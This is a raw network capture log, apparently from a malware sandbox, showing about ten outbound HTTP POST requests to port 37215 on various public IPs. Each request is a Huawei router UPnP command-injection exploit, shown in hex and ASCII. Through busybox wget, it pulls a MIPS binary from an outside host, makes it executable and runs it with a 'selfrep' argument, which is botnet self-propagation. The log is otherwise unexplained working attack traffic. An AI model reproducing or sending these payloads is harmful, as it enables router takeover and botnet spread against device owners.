                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          195192.168.2.2351408157.69.30.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.150759935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          196192.168.2.2349630157.104.113.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.150763988 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          197192.168.2.2338800157.86.115.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.150770903 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          198192.168.2.2343234157.30.91.9737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.150782108 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          199192.168.2.2357014160.125.198.20037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.150866032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          200192.168.2.2354512157.140.180.2237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.150878906 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          201192.168.2.2349512191.176.230.737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.150914907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          202192.168.2.2352700197.186.140.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.151163101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          203192.168.2.2332950157.40.31.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.151170015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          204192.168.2.2351550197.178.255.18137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.151200056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
